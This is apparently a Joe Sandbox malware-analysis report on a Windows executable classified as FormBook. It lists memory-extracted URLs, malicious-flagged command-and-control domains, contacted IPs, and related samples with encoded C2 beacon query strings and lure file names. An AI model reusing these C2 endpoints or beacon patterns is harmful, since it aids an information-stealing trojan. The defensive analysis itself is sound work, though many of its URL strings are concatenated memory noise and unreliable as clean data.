                                                                    http://www.castlegrouplt.comReferer:explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.vurporn.com/4hc5/explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.vurporn.com/4hc5/www.motionmixmedia.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                http://www.carterandcone.coml881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.fontbureau.com/designers/frere-user.html881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.pacersun.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.motionmixmedia.com/4hc5/explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://img.sedoparking.com/templates/images/hero_nc.svgexplorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.lpqxmz.siteexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.therenixgroupllc.comReferer:explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://outlook.com_explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            low
                                                                                            http://www.7141999.com/4hc5/www.pacersun.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.fontbureau.com/designersG881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.pacersun.com/4hc5/explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  unknown
                                                                                                  http://www.modluxenwa.com/4hc5/explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  unknown
                                                                                                  http://www.tcbbuilds.comReferer:explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://www.fontbureau.com/designers/?881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.founder.com.cn/cn/bThe881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.tcbbuilds.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    unknown
                                                                                                    http://www.fontbureau.com/designers?881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.pacersun.com/4hc5/www.showshoe.infoexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.therealnikib.comReferer:explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://powerpoint.office.comcemberexplorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://img.sedoparking.comexplorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.tiro.com881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.candicrem.com/4hc5/www.therenixgroupllc.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            http://www.goodfont.co.kr881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.vurporn.comReferer:explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://schemas.microexplorer.exe, 00000003.00000000.1650112973.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1652947131.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4093617722.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.typography.netD881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.quailrun-inc.com/4hc5/www.bollywood.nexusexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            http://www.galapagosdesign.com/staff/dennis.htm881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.quailrun-inc.comReferer:explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              34.68.234.4
                                                                                                              flash.funnels.msgsndr.comUnited States
                                                                                                              15169GOOGLEUSfalse
                                                                                                              154.205.127.201
                                                                                                              www.iqixuehe.comSeychelles
                                                                                                              8100ASN-QUADRANET-GLOBALUStrue
                                                                                                              45.64.97.60
                                                                                                              slotjitu88.websiteIndonesia
                                                                                                              135360ARGONDATANETWORK-AS-APArgonDataNetworkIDtrue
                                                                                                              154.86.64.96
                                                                                                              www.7141999.comSeychelles
                                                                                                              132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                                                              103.120.80.111
                                                                                                              www.lpqxmz.siteHong Kong
                                                                                                              139021WEST263GO-HKWest263InternationalLimitedHKtrue
                                                                                                              167.172.228.26
                                                                                                              pacersun.comUnited States
                                                                                                              14061DIGITALOCEAN-ASNUStrue
                                                                                                              3.64.163.50
                                                                                                              www.bollywood.nexusUnited States
                                                                                                              16509AMAZON-02UStrue
                                                                                                              199.34.228.191
                                                                                                              www.candicrem.comUnited States
                                                                                                              27647WEEBLYUStrue
                                                                                                              91.195.240.19
                                                                                                              parkingpage.namecheap.comGermany
                                                                                                              47846SEDO-ASDEfalse
                                                                                                              13.32.208.72
                                                                                                              d3at2k7gv5wser.cloudfront.netUnited States
                                                                                                              16509AMAZON-02USfalse
                                                                                                              Joe Sandbox Version:38.0.0 Ammolite
                                                                                                              Analysis ID:1332500
                                                                                                              Start date and time:2023-10-26 09:45:50 +02:00
                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                              Overall analysis duration:0h 11m 30s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:12
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:1
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample file name:881SP1exr1.exe
                                                                                                              renamed because original name is a hash value
                                                                                                              Original Sample Name:fc8b3a3005cdc80ce19af33a57010fa8.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.evad.winEXE@173/1@11/10
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 121
                                                                                                              • Number of non-executed functions: 286
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              TimeTypeDescription
                                                                                                              09:46:37API Interceptor1x Sleep call for process: 881SP1exr1.exe modified
                                                                                                              09:46:45API Interceptor7741663x Sleep call for process: explorer.exe modified
                                                                                                              09:47:22API Interceptor8111947x Sleep call for process: chkdsk.exe modified
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              154.205.127.201TT_PAYMENT_SLIP_23AUG2023.docGet hashmaliciousFormBookBrowse
                                                                                                              • www.iqixuehe.com/4hc5/?Cxl0M=YN64Xx&wL3dPBV0=+hA7uXL5/FL3GoFrrh1HMOS2s85bj4EjFJ9ovq6HPQt8uRBOeiVqbKjmcAGKz/YpQyFf2g==
                                                                                                              3Fip115gvy.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.iqixuehe.com/4hc5/?1bYL=+hA7uXKNj1KDb4QY1R1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkfmGMreAhcEx+ve05DA==&5j=tFNxItah5B1Ppp8
                                                                                                              qSvGwvVvxr.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.iqixuehe.com/4hc5/?NvWXFX=+hA7uXKNj1KDb4QY1R1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflqTzucafzMi&00G=kjNDztR8m
                                                                                                              fmCMRF012p.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.iqixuehe.com/4hc5/?W0D=+hA7uXL8/CLzG4Jnph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkfmGMreAhcEx+ve05DA==&5jRt=F0GLWN9hgdxlI
                                                                                                              New_order_24-07-23.docGet hashmaliciousFormBookBrowse
                                                                                                              • www.iqixuehe.com/4hc5/?-Z=5j_Pp62&A2M=+hA7uXL5/FL3GoFrrh1HMOS2s85bj4EjFJ9ovq6HPQt8uRBOeiVqbKjmcAGKz/YpQyFf2g==
                                                                                                              45.64.97.60TT_PAYMENT_SLIP_23AUG2023.docGet hashmaliciousFormBookBrowse
                                                                                                              • www.slotjitu88.website/4hc5/?wL3dPBV0=Td1U1SjQIKZbCXUcgTsqgzapHPyB/huuK+VwOHrCNge/Oj16i4nV3pxuuBknbP1oecIYkA==&Cxl0M=YN64Xx
                                                                                                              3Fip115gvy.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.slotjitu88.website/4hc5/?5j=tFNxItah5B1Ppp8&1bYL=Td1U1SikU6YvfHBv+jsqgzapHPyB/huuK+NgSE3DJAe+OSZ8lo2ZhtJstnkhDutgSq859wjHrQ==
                                                                                                              BRq2dpdCAO.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.slotjitu88.website/4hc5/?w6=Td1U1SjVINZfCHYQiTsqgzapHPyB/huuK+NgSE3DJAe+OSZ8lo2ZhtJstkIxffxbVfVo&Ttxp=9rkXPtix_
                                                                                                              154.86.64.96qSvGwvVvxr.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.7141999.com/4hc5/?NvWXFX=sJ+Ygj2boS23IGP4VOQMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocP0JHC/b4ap&00G=kjNDztR8m
                                                                                                              103.120.80.111TT_PAYMENT_SLIP_23AUG2023.docGet hashmaliciousFormBookBrowse
                                                                                                              • www.lpqxmz.site/4hc5/?wL3dPBV0=245SFh9gT8/q7yEoAZq1WQwUtHwLu6OXJLFZ/z0wkaCEnMe+MUwOEv69lJW52EKzavqGKA==&Cxl0M=YN64Xx
                                                                                                              Factura de proforma .pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.usmmexchange.com/de19/?AL38nB7p=QcprsbHu9MQk172D5vQ9WbPHu6lwPYsevWv7v2Hj6r4iMS50JmV5cqztJSVvguJbPvSU&6lrx=5jth78
                                                                                                              167.172.228.26DHL_Expess_Shipping_Documents_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                              • www.myeuropesmartmove.com/s9u3/?oBE=ThyDKBHxl0&jV=OjA8dTMnpFvBKvJoDTxtDw/AoQoVvyDgtxNMuA93Q0r2dVORMB00vBfczNOhWe9sg6ZcS//EwMluuCbnYsyL4kYsJru6G2WdXA==
                                                                                                              FedEx_AWB#501209127413.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.myeuropesmartmove.com/tphs/
                                                                                                              3RJv63AEc5.rtfGet hashmaliciousUnknownBrowse
